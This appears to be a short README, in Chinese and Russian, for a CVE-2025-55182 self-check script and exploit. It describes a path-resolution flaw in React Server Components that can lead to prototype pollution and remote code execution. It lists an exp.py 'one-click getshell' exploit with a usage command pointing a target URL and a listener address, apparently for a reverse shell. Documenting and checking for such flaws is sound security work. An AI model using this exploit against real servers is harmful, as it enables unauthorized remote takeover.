
CVE-2025-55182 检测方式和攻击利用
Инструмент для самопроверки, используется для проверки уязвимости CVE-2025-55182
React Server Components при декодировании полезной нагрузки, отправляемой на конечные точки серверных функций, содержат дефект разрешения пути. Путем разделения свойств объекта двоеточием реализуется вложенный доступ (например, $1:a:b соответствует {"a":{"b":"foo"}}.a.b), но не проверяется существование свойства. При передаче $1:a:a происходит невалидный доступ {}.a.a, что вызывает ошибку 500 на стороне сервера; злоумышленник, создав специальную полезную нагрузку, может использовать загрязнение прототипа и внедрение кода для достижения RCE.
exp.py – эксплуатационный код уязвимости (однокнопочный getshell)cve-2025-55182-check.sh – инструмент самопроверки хоста на уязвимостьpython3 exp.py -t http://127.0.0.1:8080/ -a 127.0.0.1:4444
CVE-2025-55182-Check.sh [-h] [-f <path>] [-a]
Данный инструмент предназначен только для исследований в области безопасности. Не используйте его в незаконных целях.